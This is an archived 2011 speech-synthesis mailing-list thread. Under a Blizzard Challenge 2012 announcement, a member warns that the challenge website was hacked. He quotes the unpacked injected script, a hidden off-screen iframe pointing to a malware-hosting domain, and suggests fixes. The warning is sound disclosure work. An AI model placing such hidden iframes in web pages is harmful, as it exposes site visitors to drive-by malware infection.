message from "Kyrian (List)" <[email protected]> to festival-talk
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
Folks,
Apologies for the on-list response, which is perhaps borderline
inappropriate, but done for haste as repairs for such matters are
usually urgent. I specialise in cleaning this sort of issue up if the
site owner, or anyone else for that matter requires assistance in the
event of such nefarious activity.
My next post will definitely be more on-topic, once I've completed my
diphone database, I'm sure I will have further questions and indeed
there is every possibility of my requiring a working Blizzard Challenge
entry page/site.
Yours,
Kev Green,
oRe Net.
http://www.orenet.co.uk/
Jonathan Horniblow (Talking Newspaper Services) wrote:
message from "Jonathan Horniblow (Talking Newspaper Services)"
<[email protected]> to festival-talk
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
Some of you have probably discovered this already, but sadly this site
appears to have been hacked.
Fortunately, browsers like Chrome reject the poorly injected
obfusctated javascript at the top of the page, but DO NOT visit with
IE 6-8 or there's a chance you'll get done!
Pasting source into http://jsunpack.jeek.org/? it reveals that the
script, once unpacked and unobfuscated, includes:
//document.write (s) <iframe width="134" height="171"
frameborder="0" style="position:absolute;left:-296px;top:-252px"
src="http://tzmnesze.gr8domain.biz/main.php?page=c74135757b8e0fc5"></iframe>
if you manually try and visit that site, Google warns you:
"tzmnesze.gr8domain.biz contains malware. Your computer might catch a
virus if you visit this site.
Google has found that malicious software may be installed onto your
computer if you proceed. If you've visited this site in the past or
you trust this site, it's possible that it has just recently been
compromised by a hacker. You should not proceed. Why not try again
tomorrow or go somewhere else?
We have already notified tzmnesze.gr8domain.biz that we found malware
on the site. For more about the problems found on
tzmnesze.gr8domain.biz, visit the Google Safe Browsing diagnostic
page."
I would suggest the site owner might want to double check all the site
permissions, mysql injection vulnerabilities, and possibly chmod all
possible files to 600 until he's found the source of the injection as
a prevention measure.
On Sun, Dec 4, 2011 at 7:09 PM, Simon King <[email protected]> wrote:
message from Simon King <[email protected]> to festival-talk
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
Dear all,
I'm delighted to formally announce the call for participation in Phase Two of
the Blizzard Challenge 2012. You can read all about this challenge, which is
based on audiobook data, here:
http://www.synsig.org/index.php/Blizzard_Challenge_2012
This time around, we have a new type of challenge. In addition to the synthesis
challenge, there is also an evaluation challenge. We do hope many of you will
consider entering this task, where the aim is to devise a suitable form of
evaluation for audiobook speech ynthesis.
You can enter the synthesis challenge, or the evaluation challenge, or both.
regards,
Simon
on behalf of the organisers: Simon King, Alan W Black and Keiichi Tokuda
--
Kev Green, aka Kyrian. E: kyrian@ore.org WWW: http://kyrian.ore.org/
Linux/Security Contractor/LAMP Coder/ISP, via http://www.orenet.co.uk/
DJ via http://www.hellnoise.co.uk/
Human Rights left unattended may be Removed, or Destroyed, or Damaged
by the Security Services.
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
= University of Edinburgh's Festival Speech Synthesis System =
= http://festvox.org/festival Sent Via [email protected] =
= To unsubscribe mail [email protected] =
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
_______________________________________________
Festlang-talk mailing list
[email protected]
https://lists.berlios.de/mailman/listinfo/festlang-talk